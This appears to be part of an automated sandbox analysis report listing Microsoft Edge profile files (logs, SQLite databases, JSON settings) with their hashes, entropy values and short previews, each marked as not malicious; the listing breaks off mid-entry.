                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:[]
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:[]
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                              MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):80
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                              MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                              SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                              SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                              SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):426
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.214256786330581
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:TXIvVaYebvqBZFUt8qXHP/+qnz5OaYebvqBaJ:TX6VaYebvyg8qXH7nlOaYebvL
                                                                                                                                                                                                                                                                                              MD5:D3311CB05A5B4BD78758880BF7390E76
                                                                                                                                                                                                                                                                                              SHA1:5AB082DC952FB559780A405E1F732CBFC276027C
                                                                                                                                                                                                                                                                                              SHA-256:F11AAC23BF0CC99F0C363D9FF3759D4286631EB8892CDEABC1C892CE32CFC270
                                                                                                                                                                                                                                                                                              SHA-512:902B52078F615D1F3CB7D4C836DC907EB477A2C5F69D1E6BE1FB85079037A51703ABB6ADCF7D8F483BCA1BA48B9719A0BA34DAEB8534D28A14933C0BA0542F8F
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/11/28-01:22:35.626 1eb4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/28-01:22:35.628 1eb4 Recovering log #3.2024/11/28-01:22:35.631 1eb4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):426
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.214256786330581
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:TXIvVaYebvqBZFUt8qXHP/+qnz5OaYebvqBaJ:TX6VaYebvyg8qXH7nlOaYebvL
                                                                                                                                                                                                                                                                                              MD5:D3311CB05A5B4BD78758880BF7390E76
                                                                                                                                                                                                                                                                                              SHA1:5AB082DC952FB559780A405E1F732CBFC276027C
                                                                                                                                                                                                                                                                                              SHA-256:F11AAC23BF0CC99F0C363D9FF3759D4286631EB8892CDEABC1C892CE32CFC270
                                                                                                                                                                                                                                                                                              SHA-512:902B52078F615D1F3CB7D4C836DC907EB477A2C5F69D1E6BE1FB85079037A51703ABB6ADCF7D8F483BCA1BA48B9719A0BA34DAEB8534D28A14933C0BA0542F8F
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/11/28-01:22:35.626 1eb4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/28-01:22:35.628 1eb4 Recovering log #3.2024/11/28-01:22:35.631 1eb4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):332
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.116172644330635
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:HxXVq2PN723oH+TcwtpIFUt8YkgZmw+YkIkwON723oH+Tcwta/WLJ:RlvVaYebmFUt8a/+m5OaYebaUJ
                                                                                                                                                                                                                                                                                              MD5:FCABFAEB09CAA79749025B78C28FDBE9
                                                                                                                                                                                                                                                                                              SHA1:794569F5A342A70A67D387D2B2445EB0AF864E74
                                                                                                                                                                                                                                                                                              SHA-256:4248F5168AAF63C9EB0676634533BAF17BD9B0951DD78ECECE6B74AC79069B5F
                                                                                                                                                                                                                                                                                              SHA-512:62E1FC2C19AF305EDD10F345912AC7A14EDC772BEAA890EAF5CFAC7CD3FCA0AF78456A8ED7A46BB109B66944F328C78D3C8D9DE6D1153EF57C348801255CD7F2
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/11/28-01:22:24.182 14c4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/28-01:22:24.183 14c4 Recovering log #3.2024/11/28-01:22:24.183 14c4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):332
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.116172644330635
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:HxXVq2PN723oH+TcwtpIFUt8YkgZmw+YkIkwON723oH+Tcwta/WLJ:RlvVaYebmFUt8a/+m5OaYebaUJ
                                                                                                                                                                                                                                                                                              MD5:FCABFAEB09CAA79749025B78C28FDBE9
                                                                                                                                                                                                                                                                                              SHA1:794569F5A342A70A67D387D2B2445EB0AF864E74
                                                                                                                                                                                                                                                                                              SHA-256:4248F5168AAF63C9EB0676634533BAF17BD9B0951DD78ECECE6B74AC79069B5F
                                                                                                                                                                                                                                                                                              SHA-512:62E1FC2C19AF305EDD10F345912AC7A14EDC772BEAA890EAF5CFAC7CD3FCA0AF78456A8ED7A46BB109B66944F328C78D3C8D9DE6D1153EF57C348801255CD7F2
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/11/28-01:22:24.182 14c4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/28-01:22:24.183 14c4 Recovering log #3.2024/11/28-01:22:24.183 14c4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x37, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):196608
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.26779526095846
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:L/2qOB1nxCkM9SA1LyKOMq+8iP5GDHP/0jMVumj:Kq+n0J991LyKOMq+8iP5GLP/0m
                                                                                                                                                                                                                                                                                              MD5:8193EDCB3C931CABF2BE7790D1E00AF5
                                                                                                                                                                                                                                                                                              SHA1:08CFDD7133905815C3653443D5FDEE0F742BF642
                                                                                                                                                                                                                                                                                              SHA-256:75DA38D48616A24BF852BF703CCBE1B48DE9A0C8806C243BFEE7D8A58E35F187
                                                                                                                                                                                                                                                                                              SHA-512:461D45E0B17B217325680B1AD50E2CE0E51853FDE19B21BA866F3770B5BC64C9F0D5A64FE63D5EF8822CFBD8C107109F3C991F867673F1FBCE9648B786FC2AE4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ .......[...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):11755
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                              MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                              SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                              SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                              SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, writer version 2, read version 2, file counter 8, database pages 11, cookie 0x7, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):45056
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.46023131950011464
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:TSWUYP5/ZrK/AxH1Aj5sAFWZmasamfDsCBjy8RgdcI5fc:TnUYVAKAFXX+TcEc
                                                                                                                                                                                                                                                                                              MD5:D13F665266AE8BC1EBF7A85678B86162
                                                                                                                                                                                                                                                                                              SHA1:6D0DA9F52926C68EFBB4711DE4B8AC8F02FFC2C5
                                                                                                                                                                                                                                                                                              SHA-256:9A2A1269BDCE4E9F5D6D74E1B25674AFC2D3B493FCF821FB7CB20D3BE2E516AB
                                                                                                                                                                                                                                                                                              SHA-512:2F451248EF567300479229B20C0F26141B397680594015A70ACD05B3F78C0DE02945388C7265DD394FDF81F822ECD6DF1520807E953F61E509FF755CF15EA01E
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..................?.P................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.05394456249132752
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:GtStutObuQXSl/tStutObuQXBR9XjhslotGLNl0ml/Vl/XoQXEl:MtQXSlrtQXBL1EjVl/PvoQ
                                                                                                                                                                                                                                                                                              MD5:E16736982E9B360660A96267FBF5603B
                                                                                                                                                                                                                                                                                              SHA1:4797124B6CDD22B5A44EFFBA6EA16C4D8C7152DD
                                                                                                                                                                                                                                                                                              SHA-256:ECB52F4B9C84A3B677CC90107F040765DC1E38B4E4FCEB4A752168290A89D409
                                                                                                                                                                                                                                                                                              SHA-512:00D3E4E80376F3002CF297F5F39E3C38B067497E4E83D1AA0B5DC2FBDBF0DD2645BC5C0A367FD86F96B70758775BD7319734B7106738B7820D66A3FC3AA70157
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:..-.......................l..>".$J...V..^..2.bD2..-.......................l..>".$J...V..^..2.bD2........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):86552
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.8703057280957472
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:eqzxjlO+H1qcbX+En9VAKAFXX+pRw2VAKAFXX+6xOqVAKAFXX+GnUYVAKAFXX+aE:e6xLV0xNs/cNswO5NshNsaA20
                                                                                                                                                                                                                                                                                              MD5:17C8BA405BBF416CD136D69150D9BFBC
                                                                                                                                                                                                                                                                                              SHA1:F52B53DDDC7BC103AD271865D38AE195C69F051B
                                                                                                                                                                                                                                                                                              SHA-256:989A6700E4CD6DAB556CD9727A809E97861ADEA7BB8FED2E47E75D39D8132AD8
                                                                                                                                                                                                                                                                                              SHA-512:376C078E176F169D391D22059A8FC97FE9DD8FF5902FC96EFDE153026B62730C3975FB90EAB4FF2609ACEFC83498728A5700B3AF1ECE59FC1CB7A3E5B6480B8F
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:7....-..........$J...V....M7'.z.........$J...V..h.IR..4.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):554
                                                                                                                                                                                                                                                                                              Entropy (8bit):2.927488883401678
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:/XntM+Bcil3sedhO7yOuuuuuuuuuuuuuuuuuuuuuu:p9lc8QyOuuuuuuuuuuuuuuuuuuuuuu
                                                                                                                                                                                                                                                                                              MD5:576E928A58B29421D5CDC9D1D2D40DD5
                                                                                                                                                                                                                                                                                              SHA1:AA4668F1E3AC8E70BD1DEDBEB8F664194791769D
                                                                                                                                                                                                                                                                                              SHA-256:991318A24B1CC5AE91B0FCE3378C9583C061AF30A07D8C4E5CA54985F73900B6
                                                                                                                                                                                                                                                                                              SHA-512:89F9E87915FD8BF3C0DB5E37F977DA059638AAC69AC0E75569BA85023249D9F9560EE892974AD62B3A95AD8998CD94CF103C0B3894B9CD789F8EC454D394BC13
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:A..r.................20_1_1...1.,U.................20_1_1...1..$.0................39_config..........6.....n ...1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):328
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.200530406459128
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:Hqsq2PN723oH+TcwtfrK+IFUt8YqkZmw+YqEkwON723oH+TcwtfrUeLJ:xvVaYeb23FUt8C/+u5OaYeb3J
                                                                                                                                                                                                                                                                                              MD5:156F2E3F3B7D35CCC1698FC7980120B2
                                                                                                                                                                                                                                                                                              SHA1:1DB21BB9E593495141E6B5428F18096B1969A6AD
                                                                                                                                                                                                                                                                                              SHA-256:53ED08F11681783461753FA1DBDBC28FFCD41F6E0307B06B515B1D488D45F510
                                                                                                                                                                                                                                                                                              SHA-512:5FB854BAD094730D7432029914F53B606635DCCB607E4F08EB5CFE56479D7BE79628EB919B5A1D12801E13A0C69848D814E456BD2EC6F855AAA2B5545B8132E2
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/11/28-01:22:24.835 1864 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/28-01:22:24.836 1864 Recovering log #3.2024/11/28-01:22:24.836 1864 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):328
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.200530406459128
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:Hqsq2PN723oH+TcwtfrK+IFUt8YqkZmw+YqEkwON723oH+TcwtfrUeLJ:xvVaYeb23FUt8C/+u5OaYeb3J
                                                                                                                                                                                                                                                                                              MD5:156F2E3F3B7D35CCC1698FC7980120B2
                                                                                                                                                                                                                                                                                              SHA1:1DB21BB9E593495141E6B5428F18096B1969A6AD
                                                                                                                                                                                                                                                                                              SHA-256:53ED08F11681783461753FA1DBDBC28FFCD41F6E0307B06B515B1D488D45F510
                                                                                                                                                                                                                                                                                              SHA-512:5FB854BAD094730D7432029914F53B606635DCCB607E4F08EB5CFE56479D7BE79628EB919B5A1D12801E13A0C69848D814E456BD2EC6F855AAA2B5545B8132E2
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/11/28-01:22:24.835 1864 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/28-01:22:24.836 1864 Recovering log #3.2024/11/28-01:22:24.836 1864 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):816
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.0647916882227655
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:G0nYUtTNop//z32m5t/yVf9HqlIZfkBA//DtKhKg+rOyBrgxvB1ySxs:G0nYUtypD32m3yWlIZMBA5NgKIvB8Sxs
                                                                                                                                                                                                                                                                                              MD5:3BE72D8D40752B3A97028FDB2931FABA
                                                                                                                                                                                                                                                                                              SHA1:A27EA4726857A948F0A4B074062B674469A9A371
                                                                                                                                                                                                                                                                                              SHA-256:3C18553C8C3F7E801855F3579AC57F3C156D783BBA27FB35C6D2FB6CB89BD902
                                                                                                                                                                                                                                                                                              SHA-512:8EBD4D6980BB7796615217E72BC65953C920B68B9259341CD52858C1E889EC90339E2A304FE0C971D6C6EF9AFC4A00CFB3E5CC89C7B2DF8737A0C7EC241BDADC
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....X...................20_.....W.J+.................19_......qY.................18_.....'}2..................37_.......c..................38_......i...................39_.....Owa..................20_.....4.9..................20_.....B.I..................19_..........................18_.....2.1..................37_..........................38_......=.%.................39_.....p.j..................9_.....JJ...................9_.....|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... ......................__global... .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):346
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.171925104525844
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:HZ+q2PN723oH+TcwtfrzAdIFUt8YqyZmw+Yq+kwON723oH+TcwtfrzILJ:5+vVaYeb9FUt80/+05OaYeb2J
                                                                                                                                                                                                                                                                                              MD5:D5494C0F5DC329B164B94028ABED8032
                                                                                                                                                                                                                                                                                              SHA1:F31623C2164B6B4ABA1E829876F542892FEAD6D6
                                                                                                                                                                                                                                                                                              SHA-256:543D1393AA47941ED1701F3F343546D21F242FB9EAD9935DD47E5EE013492878
                                                                                                                                                                                                                                                                                              SHA-512:E990FB014EB683E62B0950299BA85D79B1CF2F59A972DEB580FF99B7CBE0954652E775E72CBA62DAA37899AC0685DC91014320C160DCA047D6A33FE1C4EC394F
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/11/28-01:22:24.829 1864 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/28-01:22:24.830 1864 Recovering log #3.2024/11/28-01:22:24.830 1864 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):346
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.171925104525844
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:HZ+q2PN723oH+TcwtfrzAdIFUt8YqyZmw+Yq+kwON723oH+TcwtfrzILJ:5+vVaYeb9FUt80/+05OaYeb2J
                                                                                                                                                                                                                                                                                              MD5:D5494C0F5DC329B164B94028ABED8032
                                                                                                                                                                                                                                                                                              SHA1:F31623C2164B6B4ABA1E829876F542892FEAD6D6
                                                                                                                                                                                                                                                                                              SHA-256:543D1393AA47941ED1701F3F343546D21F242FB9EAD9935DD47E5EE013492878
                                                                                                                                                                                                                                                                                              SHA-512:E990FB014EB683E62B0950299BA85D79B1CF2F59A972DEB580FF99B7CBE0954652E775E72CBA62DAA37899AC0685DC91014320C160DCA047D6A33FE1C4EC394F
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/11/28-01:22:24.829 1864 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/28-01:22:24.830 1864 Recovering log #3.2024/11/28-01:22:24.830 1864 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0018238520723782249
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2zEjXyKl/:/M/xT02zsZt
                                                                                                                                                                                                                                                                                              MD5:B2F2F1733175EA2EE03BFBBB97ED86C9
                                                                                                                                                                                                                                                                                              SHA1:6CE61DE848264AD7849BB5A2B1E7B9870DE0A59F
                                                                                                                                                                                                                                                                                              SHA-256:4660D25B10A638EDCBF5FA76A7829162A2C103503FA7BB3B3E627420F0C38D05
